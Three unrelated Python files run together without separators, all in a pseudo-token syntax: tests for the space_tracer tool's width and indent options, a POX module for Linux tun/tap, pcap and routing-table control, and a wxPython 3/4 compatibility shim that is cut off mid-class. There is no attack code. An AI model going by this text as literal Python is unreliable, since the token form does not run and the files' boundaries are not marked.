<import_from_stmt>space_tracer.main replace_input TraceRunner<def_stmt>test_source_width_positive <block_start>code="""\ i = 1 + 1 """<line_sep>expected_report="""\ i = 1 + | i = 2"""<with_stmt>replace_input(code)<block_start>report=TraceRunner().trace_command(['space_tracer' '--source_width' '8' '--traced_file' 'foo.py'])<block_end><assert_stmt>report<eq>expected_report<block_end><def_stmt>test_source_width_negative <block_start>code="""\ i = 1 + 1 """<line_sep>expected_report="""\ i = 1 + | i = 2"""<with_stmt>replace_input(code)<block_start>report=TraceRunner().trace_command(['space_tracer' '--source_width' '-2' '--traced_file' 'foo.py'])<block_end><assert_stmt>report<eq>expected_report<block_end><def_stmt>test_source_indent <block_start>code="""\ i = 1 + 1 """<line_sep>expected_report="""\ i = 1 + 1 | i = 2"""<with_stmt>replace_input(code)<block_start>report=TraceRunner().trace_command(['space_tracer' '--source_indent' '4' '--traced_file' 'foo.py'])<block_end><assert_stmt>report<eq>expected_report<block_end><def_stmt>test_source_indent_small <block_start>code="""\ i = 1 + 1 """<line_sep>expected_report="""\ i = 1 + 1 | i = 2"""<with_stmt>replace_input(code)<block_start>report=TraceRunner().trace_command(['space_tracer' '--source_indent' '2' '--traced_file' 'foo.py'])<block_end><assert_stmt>report<eq>expected_report<block_end><def_stmt>test_source_indent_negative <block_start>code="""\ i = 1 + 1 """<line_sep>expected_report="""\ = 1 + 1 | i = 2"""<with_stmt>replace_input(code)<block_start>report=TraceRunner().trace_command(['space_tracer' '--source_indent' '-2' '--traced_file' 'foo.py'])<block_end><assert_stmt>report<eq>expected_report<block_end><def_stmt>test_trace_width <block_start>code="""\ i = 1 + 1 """<line_sep>expected_report="""\ i = 1 + 1 | i ="""<with_stmt>replace_input(code)<block_start>report=TraceRunner().trace_command(['space_tracer' '--trace_width' '15' '--traced_file' 'foo.py'])<block_end><assert_stmt>report<eq>expected_report<block_end><def_stmt>test_trace_width_negative <block_start>code="""\ i = 1 + 1 s = 'a' * 10 """<line_sep>expected_report="""\ i = 1 + 1 | i = 2 s = 'a' * 10 | s = 'aaaaaa"""<with_stmt>replace_input(code)<block_start>report=TraceRunner().trace_command(['space_tracer' '--trace_width' '-5' '--traced_file' 'foo.py'])<block_end><assert_stmt>report<eq>expected_report<block_end><def_stmt>test_trace_width_without_source <block_start>code="""\ i = 1 + 1 s = 'a' * 10 """<line_sep>expected_report="""\ i = 2 s = 'aaaaaa"""<with_stmt>replace_input(code)<block_start>report=TraceRunner().trace_command(['space_tracer' '--source_width' '0' '--trace_width' '-5' '--traced_file' 'foo.py'])<block_end><assert_stmt>report<eq>expected_report<block_end><def_stmt>test_trace_offset <block_start>code="""\ i = 1 + 1 s = 'a' * 10 """<line_sep>expected_report="""\ i = 1 + 1 | 2 s = 'a' * 10 | 'aaaaaaaaaa'"""<with_stmt>replace_input(code)<block_start>report=TraceRunner().trace_command(['space_tracer' '--trace_offset' '3' '--traced_file' 'foo.py'])<block_end><assert_stmt>report<eq>expected_report<block_end>
# Copyright 2017 <NAME> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at: # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Input and output from network interfaces. This wraps PCap, TunTap, etc., to provide a simple, universal, cooperative interface to network interfaces. Currently limited to Linux. """<import_from_stmt>pox.lib.pxpcap PCap<import_from_stmt>queue Queue<import_from_stmt>pox.lib.revent Event EventMixin<import_from_stmt>pox.lib.ioworker.io_loop ReadLoop<import_from_stmt>pox.core core<import_stmt>struct<import_from_stmt>fcntl ioctl<import_stmt>socket<import_from_stmt>pox.lib.addresses EthAddr IPAddr<import_from_stmt>pox.lib.addresses parse_cidr cidr_to_netmask<import_stmt>os<import_stmt>ctypes<line_sep>IFNAMESIZ=16<line_sep>IFREQ_SIZE=40<line_sep># from linux/if_tun.h TUNSETIFF=0x400454ca<line_sep>TUNGETIFF=0x800454d2<line_sep>IFF_TUN=0x0001<line_sep>IFF_TAP=0x0002<line_sep>IFF_NO_PI=0x1000<line_sep>IFF_ONE_QUEUE=0x2000<line_sep>IFF_VNET_HDR=0x4000<line_sep>IFF_TUN_EXCL=0x8000<line_sep>IFF_MULTI_QUEUE=0x0100<line_sep>IFF_ATTACH_QUEUE=0x0200<line_sep>IFF_DETACH_QUEUE=0x0400<line_sep>IFF_PERSIST=0x0800<line_sep>IFF_NOFILTER=0x1000<line_sep>#from linux/if.h (flags) IFF_UP=1<lshift>0<line_sep>IFF_BROADCAST=1<lshift>1<line_sep>IFF_DEBUG=1<lshift>2<line_sep>IFF_LOOPBACK=1<lshift>3<line_sep>IFF_POINTOPOINT=1<lshift>4<line_sep>IFF_NOTRAILERS=1<lshift>5<line_sep>IFF_RUNNING=1<lshift>6<line_sep>IFF_NOARP=1<lshift>7<line_sep>IFF_PROMISC=1<lshift>8<line_sep>IFF_ALLMULTI=1<lshift>9<line_sep>IFF_MASTER=1<lshift>10<line_sep>IFF_SLAVE=1<lshift>11<line_sep>IFF_MULTICAST=1<lshift>12<line_sep>IFF_PORTSEL=1<lshift>13<line_sep>IFF_AUTOMEDIA=1<lshift>14<line_sep>IFF_DYNAMIC=1<lshift>15<line_sep>IFF_LOWER_UP=1<lshift>16<line_sep>IFF_DORMANT=1<lshift>17<line_sep>IFF_ECHO=1<lshift>18<line_sep># Unless IFF_NO_PI, there's a header on packets: # 16 bits of flags # 16 bits (big endian?) protocol number # from /usr/include/linux/sockios.h SIOCGIFHWADDR=0x8927<line_sep>SIOCGIFMTU=0x8921<line_sep>SIOCSIFMTU=0x8922<line_sep>SIOCGIFFLAGS=0x8913<line_sep>SIOCSIFFLAGS=0x8914<line_sep>SIOCSIFHWADDR=0x8924<line_sep>SIOCGIFNETMASK=0x891b<line_sep>SIOCSIFNETMASK=0x891c<line_sep>SIOCGIFADDR=0x8915<line_sep>SIOCSIFADDR=0x8916<line_sep>SIOCGIFBRDADDR=0x8919<line_sep>SIOCSIFBRDADDR=0x891a<line_sep>SIOCSIFNAME=0x8923<line_sep>SIOCADDRT=0x890B# rtentry (route.h) for IPv4, in6_rtmsg for IPv6 SIOCDELRT=0x890C<line_sep># from /usr/include/linux/if_arp.h ARPHRD_ETHER=1<line_sep>ARPHRD_IEEE802=1<line_sep>ARPHRD_IEEE1394=24<line_sep>ARPHRD_EUI64=27<line_sep>ARPHRD_LOOPBACK=772<line_sep>ARPHRD_IPGRE=778<line_sep>ARPHRD_IEE802_TR=800<line_sep>ARPHRD_IEE80211=801<line_sep>ARPHRD_IEE80211_PRISM=802<line_sep>ARPHRD_IEE80211_RADIOTAP=803<line_sep>ARPHRD_IP6GRE=823<class_stmt>rtentry(object)<block_start>""" Wrapper for Linux rtentry Only tries to capture IPv4 usage. Possibly better done with ctypes. """<line_sep># flags RTF_UP=0x0001# usable RTF_GATEWAY=0x0002# dst is gateway RTF_HOST=0x0004# host route RTF_REINSTATE=0x0008# reinstate after timeout RTF_DYNAMIC=0x0010# created dynamically (by redirect) RTF_MODIFIED=0x0020# modified dynamically (by redirect) RTF_MSS=0x0040# use specific MSS for this route RTF_WINDOW=0x0080# use per-route window clamping RTF_IRTT=0x0100# use initial RTT RTF_REJECT=0x0200# reject route # fields rt_hash=0<line_sep>rt_dst=IPAddr("0.0.0.0")<line_sep>rt_gateway=IPAddr("0.0.0.0")<line_sep>rt_genmask=IPAddr("0.0.0.0")<line_sep>rt_flags=0<line_sep>rt_refcnt=0<line_sep>rt_use=0<line_sep>rt_ifp=0# ptr to struct ifnet rt_metric=0<line_sep>rt_dev=<none># device name rt_mss=0<line_sep>rt_window=0# window clamping rt_irtt=0# initial RTT <def_stmt>pack self<block_start><if_stmt>self.rt_dev<block_start>s=ctypes.c_char_p(self.rt_dev+"\0")# Null terminator necessary? dev=ctypes.cast(s ctypes.c_void_p).value<line_sep>self._buf=s# You must use the resulting packed string before changing # rt_dev! <block_end><else_stmt><block_start>dev=0<block_end><return>struct.pack("L16s16s16shhLPhPLLH" self.rt_hash sockaddr_in(self.rt_dst).pack() sockaddr_in(self.rt_gateway).pack() sockaddr_in(self.rt_genmask).pack() self.rt_flags self.rt_refcnt self.rt_use self.rt_ifp self.rt_metric dev self.rt_mss self.rt_window self.rt_irtt)<block_end><block_end><class_stmt>sockaddr_in(object)<block_start>""" Wrapper for sockaddr_in """<line_sep>sin_family=socket.AF_INET<line_sep>sin_port=0<line_sep>sin_addr=IPAddr("0.0.0.0")<def_stmt>__init__ self addr=<none> port=<none><block_start><if_stmt>addr<is><not><none><block_start>self.sin_addr=IPAddr(addr)<block_end><if_stmt>port<is><not><none><block_start>self.sin_port=port<block_end><block_end><def_stmt>pack self<block_start>r=struct.pack("hH" self.sin_family self.sin_port)<line_sep>r<augadd>self.sin_addr.raw<line_sep>r<augadd>("\0"<times>8)<line_sep><return>r<block_end><block_end><class_stmt>Interface(object)<block_start>""" Simple interface to tun/tap driver Currently only for Linux. IIRC, shouldn't be too hard to adapt for BSD. Other OSes will probably need a fair amount of work. """<line_sep>#TODO: Setters <def_stmt>__init__ self name<block_start>self._name=name<block_end><def_stmt>__str__ self<block_start><return>"%s('%s')"%(type(self).__name__ self.name)<block_end>@property<def_stmt>name self<block_start><return>self._name.rstrip("\0")<block_end>@name.setter<def_stmt>name self value<block_start><if_stmt>len(value)<g>IFNAMESIZ<block_start><raise>RuntimeError("Name too long")<block_end>sock=socket.socket(socket.AF_INET socket.SOCK_DGRAM)<line_sep>ifr=struct.pack(str(IFNAMESIZ)+"s" self.name)<line_sep>ifr<augadd>value<line_sep>ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(sock SIOCSIFNAME ifr)<line_sep>self._name=value<block_end>@property<def_stmt>ipv6_enabled self<block_start>f=file("/proc/sys/net/ipv6/conf/%s/disable_ipv6"%(self.name ) "r")<with_stmt>f<block_start><return>f.read()[0]<eq>"0"<block_end><block_end># Note inversion! @ipv6_enabled.setter<def_stmt>ipv6_enabled self value<block_start>f=file("/proc/sys/net/ipv6/conf/%s/disable_ipv6"%(self.name ) "w")<with_stmt>f<block_start>f.write("0"<if>value<else>"1")<block_end><block_end># Note inversion! @property<def_stmt>ip_forwarding self<block_start>f=file("/proc/sys/net/ipv4/conf/%s/forwarding"%(self.name ) "r")<with_stmt>f<block_start><return>f.read()[0]<eq>"1"<block_end><block_end>@ip_forwarding.setter<def_stmt>ip_forwarding self value<block_start>f=file("/proc/sys/net/ipv4/conf/%s/forwarding"%(self.name ) "w")<with_stmt>f<block_start>f.write("1"<if>value<else>"0")<block_end><block_end>@property<def_stmt>mtu self<block_start>sock=socket.socket(socket.AF_INET socket.SOCK_DGRAM)<line_sep>ifr=struct.pack(str(IFNAMESIZ)+"s" self.name)<line_sep>ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(sock SIOCGIFMTU ifr)<line_sep><return>struct.unpack("I" ret[IFNAMESIZ:][:4])[0]<block_end>@mtu.setter<def_stmt>mtu self value<block_start>sock=socket.socket(socket.AF_INET socket.SOCK_DGRAM)<line_sep>ifr=struct.pack(str(IFNAMESIZ)+"sI" self.name value)<line_sep>ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(sock SIOCSIFMTU ifr)<block_end>@property<def_stmt>flags self<block_start>sock=socket.socket(socket.AF_INET socket.SOCK_DGRAM)<line_sep>ifr=struct.pack(str(IFNAMESIZ)+"s" self.name)<line_sep>ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(sock SIOCGIFFLAGS ifr)<line_sep><return>struct.unpack("H" ret[IFNAMESIZ:IFNAMESIZ+2])[0]<block_end>@flags.setter<def_stmt>flags self value<block_start>sock=socket.socket(socket.AF_INET socket.SOCK_DGRAM)<line_sep>ifr=struct.pack(str(IFNAMESIZ)+"sH" self.name value)<line_sep>ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(sock SIOCSIFFLAGS ifr)<block_end><def_stmt>set_flags self flags on=<true><block_start><if_stmt>on<block_start>self.flags<augor>flags<block_end><else_stmt><block_start>self.unset_flags(flags)<block_end><block_end><def_stmt>unset_flags self flags<block_start>self.flags=self.flags&(flags^0xffFF)<block_end>@property<def_stmt>promiscuous self<block_start><return>bool(self.flags&IFF_PROMISC)<block_end>@promiscuous.setter<def_stmt>promiscuous self value<block_start>self.set_flags(IFF_PROMISC value)<block_end>@property<def_stmt>is_up self<block_start><return>(self.flags&IFF_UP)<ne>0<block_end>@is_up.setter<def_stmt>is_up self value<block_start>self.set_flags(IFF_UP value)<block_end>@property<def_stmt>is_running self<block_start><return>(self.flags&IFF_RUNNING)<ne>0<block_end>@property<def_stmt>arp_enabled self<block_start><return>(self.flags&IFF_NOARP)<eq>0<block_end>@arp_enabled.setter<def_stmt>arp_enabled self value<block_start>self.set_flags(IFF_NOARP <not>value)<block_end>@property<def_stmt>ip_addr self<block_start><try_stmt><block_start><return>self._ioctl_get_ipv4(SIOCGIFADDR)<block_end><except_stmt>IOError<as>e<block_start><if_stmt>e.errno<eq>99<block_start><return><none><block_end><raise><block_end><block_end>@ip_addr.setter<def_stmt>ip_addr self value<block_start><return>self._ioctl_set_ipv4(SIOCSIFADDR value)<block_end>@property<def_stmt>netmask self<block_start><try_stmt><block_start><return>self._ioctl_get_ipv4(SIOCGIFNETMASK)<block_end><except_stmt>IOError<as>e<block_start><if_stmt>e.errno<eq>99<block_start><return><none><block_end><raise><block_end><block_end>@netmask.setter<def_stmt>netmask self value<block_start><return>self._ioctl_set_ipv4(SIOCSIFNETMASK value)<block_end>@property<def_stmt>broadcast_addr self<block_start><try_stmt><block_start><return>self._ioctl_get_ipv4(SIOCGIFBRDADDR)<block_end><except_stmt>IOError<as>e<block_start><if_stmt>e.errno<eq>99<block_start><return><none><block_end><raise><block_end><block_end>@broadcast_addr.setter<def_stmt>broadcast_addr self value<block_start><return>self._ioctl_set_ipv4(SIOCSIFBRDADDR value)<block_end>@property<def_stmt>eth_addr self<block_start>sock=socket.socket(socket.AF_INET socket.SOCK_DGRAM)<line_sep>ifr=struct.pack(str(IFNAMESIZ)+"s" self.name)<line_sep>ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(sock SIOCGIFHWADDR ifr)<line_sep>sa=ret[IFNAMESIZ:]# sockaddr <return>self._get_eth(sa)<block_end>@eth_addr.setter<def_stmt>eth_addr self value<block_start>value=EthAddr(value).raw<line_sep>sock=socket.socket(socket.AF_INET socket.SOCK_DGRAM)<line_sep>ifr=struct.pack(str(IFNAMESIZ)+"sH" self.name ARPHRD_ETHER)<line_sep>ifr<augadd>value# Append to sockaddr ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(sock SIOCSIFHWADDR ifr)<block_end><def_stmt>_ioctl_get_ipv4 self which<block_start>sock=socket.socket(socket.AF_INET socket.SOCK_DGRAM)<line_sep>ifr=struct.pack(str(IFNAMESIZ)+"s" self.name)<line_sep>ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(sock which ifr)<line_sep><return>self._get_ipv4(ret[IFNAMESIZ:])<block_end><def_stmt>_ioctl_set_ipv4 self which value<block_start>value=IPAddr(value)<line_sep>sock=socket.socket(socket.AF_INET socket.SOCK_DGRAM)<line_sep>ifr=struct.pack(str(IFNAMESIZ)+"sHHI" self.name socket.AF_INET 0 value.toUnsigned(networkOrder=<true>))<line_sep>ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(sock which ifr)<block_end>@staticmethod<def_stmt>_get_ipv4 sa<block_start>sa_family=struct.unpack("H" sa[:2])[0]<if_stmt>sa_family<eq>socket.AF_INET<block_start><return>IPAddr(sa[4:8])<block_end><else_stmt><block_start><raise>RuntimeError("Unsupported hardware type %s for %s (expected %s)"%(sa_family self socket.AF_INET))<block_end><block_end>@staticmethod<def_stmt>_get_eth sa<block_start>sa_family=struct.unpack("H" sa[:2])[0]<if_stmt>sa_family<eq>ARPHRD_ETHER<block_start><return>EthAddr(sa[2:8])<block_end><else_stmt><block_start><raise>RuntimeError("Unsupported hardware type %s (expected %s)"%(sa_family ARPHRD_ETHER))<block_end><block_end><def_stmt>add_default_route self *args **kw<block_start><return>self.add_route("0.0.0.0/0" *args **kw)<block_end><def_stmt>add_route self network gateway=<none> dev=() metric=0<block_start>""" Add routing table entry If dev is unspecified, it defaults to this device """<line_sep><return>self._add_del_route(network gateway dev metric SIOCADDRT)<block_end><def_stmt>del_route self network gateway=<none> dev=() metric=0<block_start>""" Remove a routing table entry If dev is unspecified, it defaults to this device """<line_sep><return>self._add_del_route(network gateway dev metric SIOCDELRT)<block_end><def_stmt>_add_del_route self network gateway=<none> dev=() metric=0 command=<none><block_start>""" Add or remove a routing table entry If dev is unspecified, it defaults to this device """<line_sep>r=rtentry()<if_stmt>isinstance(network tuple)<block_start>addr,mask=network<line_sep>addr=str(addr)<if_stmt>isinstance(mask int)<block_start>mask=cidr_to_netmask(mask)<block_end>mask=str(mask)<line_sep>network="%s/%s"%(addr mask)<block_end>host=<false><if_stmt>isinstance(network IPAddr)<or>(isinstance(network str)<and>"/"<not><in>network)<block_start>host=<true><block_end>network,bits=parse_cidr(network)<line_sep>r.rt_dst=network<line_sep>r.rt_genmask=cidr_to_netmask(bits)<if_stmt>gateway<is><not><none><block_start>r.rt_gateway=IPAddr(gateway)<line_sep>r.rt_flags<augor>r.RTF_GATEWAY<block_end>r.rt_metric=metric<if_stmt>dev<is>()<block_start>dev=self<block_end><if_stmt>isinstance(dev Interface)<block_start>dev=dev.name<block_end><if_stmt>dev<block_start>r.rt_dev=dev<block_end><if_stmt>host<block_start>r.rt_flags<augor>r.RTF_HOST<block_end>r.rt_flags<augor>r.RTF_UP<line_sep>sock=socket.socket(socket.AF_INET socket.SOCK_DGRAM)<line_sep>rv=ioctl(sock command r.pack())<block_end><block_end><class_stmt>TunTap(object)<block_start>""" Simple wrapper for tun/tap interfaces Looks like a file-like object. You should be able to read/write it, select on it, etc. """<def_stmt>__init__ self name=<none> tun=<false> raw=<false><block_start>""" Create tun or tap By default, it creates a new tun or tap with a default name. If you specify a name, it will either try to create it (if it doesn't exist), or try to use an existing interface (for which you must have permission). Defaults to tap (Ethernet) mode. Specify tun=True for tun (IP) mode. Specify raw=True to skip the 32 bits of flag/protocol metadata. """<if_stmt>name<is><none><block_start>name=""<block_end>openflags=os.O_RDWR<try_stmt><block_start>openflow<augor>os.O_BINARY<block_end><except_stmt><block_start><pass><block_end>self._f=os.open("/dev/net/tun" openflags)<line_sep># an ifreq is IFREQ_SIZE bytes long, starting with an interface name # (IFNAMESIZ bytes) followed by a big union. self.is_tun=tun<line_sep>self.is_tap=<not>tun<line_sep>self.is_raw=raw<line_sep>flags=0<if_stmt>tun<block_start>flags<augor>IFF_TUN<block_end><else_stmt><block_start>flags<augor>IFF_TAP<block_end><if_stmt>raw<block_start>flags<augor>IFF_NO_PI<block_end>ifr=struct.pack(str(IFNAMESIZ)+"sH" name flags)<line_sep>ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(self.fileno() TUNSETIFF ifr)<line_sep>self.name=ret[:IFNAMESIZ]<line_sep>iflags=flags<line_sep>ifr=struct.pack(str(IFNAMESIZ)+"sH" name 0)<line_sep>ifr<augadd>"\0"<times>(IFREQ_SIZE-len(ifr))<line_sep>ret=ioctl(self.fileno() TUNGETIFF ifr)<line_sep>flags=struct.unpack("H" ret[IFNAMESIZ:IFNAMESIZ+2])[0]<line_sep>self.is_tun=(flags&IFF_TUN)<eq>IFF_TUN<line_sep>self.is_tap=<not>self.is_tun<line_sep>#self.is_raw = (flags & IFF_NO_PI) == IFF_NO_PI <block_end><def_stmt>fileno self<block_start><return>self._f<block_end><def_stmt>write self data<block_start><return>os.write(self.fileno() data)<block_end><def_stmt>read self n<block_start><return>os.read(self.fileno() n)<block_end><def_stmt>close self<block_start><return>os.close(self.fileno())<block_end>@property<def_stmt>eth_addr self<block_start><return>Interface(self.name).eth_addr<block_end><block_end><class_stmt>RXData(Event)<block_start>""" Event fired when an interface receives data """<def_stmt>__init__ self interface data<block_start>self.interface=interface<line_sep>self.data=data<block_end><block_end><class_stmt>PCapInterface(Interface EventMixin)<block_start>_eventMixin_events=set([RXData ])<def_stmt>__init__ self name<block_start>Interface.__init__(self name)<line_sep>EventMixin.__init__(self)<line_sep>self._q=Queue()<line_sep>p=PCap(name callback=self._pcap_cb start=<false>)<line_sep>p.set_direction(<true> <false>)# Incoming, not outgoing p.start()<line_sep>self.pcap=p<line_sep>core.add_listener(self._handle_GoingDownEvent)<block_end><def_stmt>_handle_GoingDownEvent self event<block_start>self.close()<block_end><def_stmt>send self data<block_start><if_stmt>self.pcap<is><none><block_start><return><block_end>self.pcap.inject(data)<block_end><def_stmt>_pcap_cb self obj data sec usec length<block_start>""" Handles incoming data from pcap This may not be on the right thread, so we just push it to a thread-safe queue and poke the cooperative thread, which will pop it later. """<line_sep>do_read=self._q.empty()<line_sep>self._q.put((obj data))<if_stmt>do_read<block_start>core.callLater(self._queue_read)<block_end><block_end><def_stmt>_queue_read self<block_start>anything=<false><for_stmt>_ range(10)# as most X at once <block_start><try_stmt><block_start>data=self._q.get(<false>)<line_sep>self._q.task_done()<line_sep>anything=<true><block_end><except_stmt><block_start><break><block_end>pcap,data=data<line_sep>self.raiseEventNoErrors(RXData self data)<block_end><if_stmt>anything# Check for remainders later <block_start>core.callLater(self._queue_read)<block_end><block_end><def_stmt>__del__ self<block_start>self.close()<block_end><def_stmt>close self<block_start><if_stmt>self.pcap<block_start>self.pcap.close()<line_sep>self.pcap=<none><block_end><block_end><block_end><class_stmt>TapInterface(Interface EventMixin)<block_start>_eventMixin_events=set([RXData ])<line_sep>io_loop=<none><line_sep>max_read_size=1600<line_sep>default_send_protocol=<none><def_stmt>__init__ self name="" tun=<false> raw=<false> protocol=<none><block_start>self.tap=<none><line_sep>self.last_flags=<none><line_sep>self.last_protocol=<none><if_stmt>protocol<block_start>self.default_send_protocol=protocol<block_end>self.io_loop=ReadLoop.singleton<line_sep>Interface.__init__(self name)<line_sep>EventMixin.__init__(self)<line_sep>self.tap=TunTap(name raw=raw tun=tun)<if_stmt><not>name<block_start>self._name=self.tap.name<block_end>self.io_loop.add(self)<block_end>@property<def_stmt>is_tap self<block_start><return>self.tap.is_tap<block_end>@property<def_stmt>is_tun self<block_start><return>self.tap.is_tun<block_end><def_stmt>send self data flags=0 protocol=<none><block_start><if_stmt><not>self.tap.is_raw<block_start><if_stmt>protocol<is><none><block_start>protocol=self.default_send_protocol<or>0<block_end>#FIXME: In the "0" case above, should we fall back to using the Etherype # in the packet? <if_stmt>flags<or>protocol<block_start>flags=struct.pack("!HH" flags protocol)# Flags reversed? <block_end><else_stmt><block_start>flags="\0\0\0\0"<block_end>data=flags+data<block_end>self.tap.write(data)<block_end><def_stmt>_do_rx self<block_start>data=self.tap.read(self.max_read_size)<if_stmt><not>self.tap.is_raw<block_start>flags,proto=struct.unpack("!HH" data[:4])<line_sep>#FIXME: This may invert the flags... self.last_flags=flags<line_sep>self.last_protocol=proto<line_sep>data=data[4:]# Cut off header <block_end>self.raiseEvent(RXData self data)<block_end><def_stmt>fileno self# Support fileno so that this can be used in IO loop directly <block_start><return>self.tap.fileno()<block_end><def_stmt>close self<block_start><if_stmt>self.tap<block_start>self.tap.close()<line_sep>self.tap=<none><line_sep>self.io_loop.remove(self)<block_end><block_end><def_stmt>__del__ self<block_start>self.close()<block_end><block_end>
<import_from_future_stmt> absolute_import division print_function<line_sep>''' Author : Lyubimov, A.Y. Created : 04/14/2014 Last Changed: 11/05/2018 Description : wxPython 3-4 compatibility tools The context managers, classes, and other tools below can be used to make the GUI code compatible with wxPython 3 and 4. Mostly, the tools convert the functions, enumerations, and classes which have been renamed in wxPython 4; the name mismatches result in exceptions. Use case 1: subclassing wx.PyControl or wx.Control: from wxtbx import wx4_compatibility as wx4c WxCtrl = wx4c.get_wx_mod(wx, wx.Control) class MyCustomControl(WxCtrl): ... Use case 2: brush style (NOTE: you can do that with fonts as well, but it doesn't seem to be necessary): from wxtbx import wx4_compatibility as wx4c bkgrd = self.GetBackgroundColour() with wx4c.set_brush_style(wx.BRUSHSTYLE_SOLID) as bstyle: brush = wx.Brush(bkgrd, bstyle) Use case 3: Toolbars from wxtbx import wx4_compatibility as wx4c, bitmaps class MyFrame(wx.Frame): def __init__(self, parent, id, title, *args, **kwargs): wx.Frame.__init__(self, parent, id, title, *args, **kwargs) self.toolbar = wx4c.ToolBar(self, style=wx.TB_TEXT) self.quit_button = self.toolbar.AddTool(toolId=wx.ID_ANY, label='Quit', kind=wx.ITEM_NORMAL, bitmap=bitmaps.fetch_icon_bitmap('actions', 'exit') shortHelp='Exit program') ... self.SetToolBar(self.toolbar) self.toolbar.Realize() '''<import_stmt>wx<import_from_stmt>contextlib contextmanager<import_stmt>importlib<line_sep>wx4=wx.__version__[0]<eq>'4'<line_sep>modnames=[('PyControl' 'Control') ('PyDataObjectSimple' 'DataObjectSimple') ('PyDropTarget' 'DropTarget') ('PyEvtHandler' 'EvtHandler') ('PyImageHandler' 'ImageHandler') ('PyLocale' 'Locale') ('PyLog' 'Log') ('PyPanel' 'Panel') ('PyPickerBase' 'PickerBase') ('PyPreviewControlBar' 'PreviewControlBar') ('PyPreviewFrame' 'PreviewFrame') ('PyPrintPreview' 'PrintPreview') ('PyScrolledWindow' 'ScrolledWindow') ('PySimpleApp' 'App') ('PyTextDataObject' 'TextDataObject') ('PyTimer' 'Timer') ('PyTipProvider' 'adv.TipProvider') ('PyValidator' 'Validator') ('PyWindow'<concat>', Window')]<line_sep>font_families=[(wx.DEFAULT wx.FONTFAMILY_DEFAULT) (wx.DECORATIVE wx.FONTFAMILY_DECORATIVE) (wx.ROMAN wx.FONTFAMILY_ROMAN) (wx.SCRIPT wx.FONTFAMILY_SCRIPT) (wx.SWISS wx.FONTFAMILY_SWISS) (wx.MODERN wx.FONTFAMILY_MODERN) (wx.TELETYPE wx.FONTFAMILY_TELETYPE)]<line_sep>font_weights=[(wx.NORMAL wx.FONTWEIGHT_NORMAL) (wx.LIGHT wx.FONTWEIGHT_LIGHT) (wx.BOLD wx.FONTWEIGHT_BOLD)]<line_sep>font_styles=[(wx.NORMAL wx.FONTSTYLE_NORMAL) (wx.ITALIC wx.FONTSTYLE_ITALIC) (wx.SLANT wx.FONTSTYLE_SLANT)]<line_sep>pen_styles=[(wx.SOLID wx.PENSTYLE_SOLID) (wx.DOT wx.PENSTYLE_DOT) (wx.LONG_DASH wx.PENSTYLE_LONG_DASH) (wx.SHORT_DASH wx.PENSTYLE_SHORT_DASH) (wx.DOT_DASH wx.PENSTYLE_DOT_DASH) (wx.USER_DASH wx.PENSTYLE_USER_DASH) (wx.TRANSPARENT wx.PENSTYLE_TRANSPARENT)]<line_sep>brush_styles=[(wx.SOLID wx.BRUSHSTYLE_SOLID) (wx.TRANSPARENT wx.BRUSHSTYLE_TRANSPARENT) (wx.STIPPLE_MASK_OPAQUE wx.BRUSHSTYLE_STIPPLE_MASK_OPAQUE) (wx.STIPPLE_MASK wx.BRUSHSTYLE_STIPPLE_MASK) (wx.STIPPLE wx.BRUSHSTYLE_STIPPLE) (wx.BDIAGONAL_HATCH wx.BRUSHSTYLE_BDIAGONAL_HATCH) (wx.CROSSDIAG_HATCH wx.BRUSHSTYLE_CROSSDIAG_HATCH) (wx.FDIAGONAL_HATCH wx.BRUSHSTYLE_FDIAGONAL_HATCH) (wx.CROSS_HATCH wx.BRUSHSTYLE_CROSS_HATCH) (wx.HORIZONTAL_HATCH wx.BRUSHSTYLE_HORIZONTAL_HATCH) (wx.VERTICAL_HATCH wx.BRUSHSTYLE_VERTICAL_HATCH) ]<def_stmt>find_module module<block_start><for_stmt>m modnames<block_start><if_stmt>module.__name__<in>m<block_start><return>m<block_end><block_end><block_end><def_stmt>find_enum enums item<block_start><for_stmt>en enums<block_start><if_stmt>item<in>en<block_start>value=en[1]<if>wx4<else>en[0]<line_sep><return>value<block_end><block_end><block_end><def_stmt>get_wx_mod base module<block_start>mname=find_module(module)[1]<if>wx4<else>find_module(module)[0]<line_sep>bname=base.__name__<if_stmt>'.'<in>mname<block_start>spl=[i<for>i mname.split('.')<if>i<ne>bname]<line_sep>modname='.'.join(spl[:-1])<line_sep>mod=importlib.import_module('{}.{}'.format(bname modname))<line_sep><return>getattr(mod spl[-1])<block_end><else_stmt><block_start><return>getattr(base mname)<block_end><block_end>@contextmanager<def_stmt>wx_mod base module<block_start>''' Identify and import the appropriate wxPython module '''<line_sep><yield>get_wx_mod(base module)<block_end>@contextmanager<def_stmt>set_font_style style<block_start><yield>find_enum(font_styles style)<block_end>@contextmanager<def_stmt>set_font_weight weight<block_start><yield>find_enum(font_weights weight)<block_end>@contextmanager<def_stmt>set_font_family family<block_start><yield>find_enum(font_families family)<block_end>@contextmanager<def_stmt>set_pen_style style<block_start><yield>find_enum(pen_styles style)<block_end>@contextmanager<def_stmt>set_brush_style style<block_start><yield>find_enum(brush_styles style)<block_end>@contextmanager<def_stmt>create_measuring_context <block_start>dc=wx.GraphicsContext.Create()<if>wx4<else>wx.GraphicsContext.CreateMeasuringContext()<line_sep><yield>dc<block_end><class_stmt>Wx3ToolBar(wx.ToolBar)<block_start>''' Special toolbar class that accepts wxPython 4-style AddTool command and converts it to a wxPython 3-style AddLabelTool command 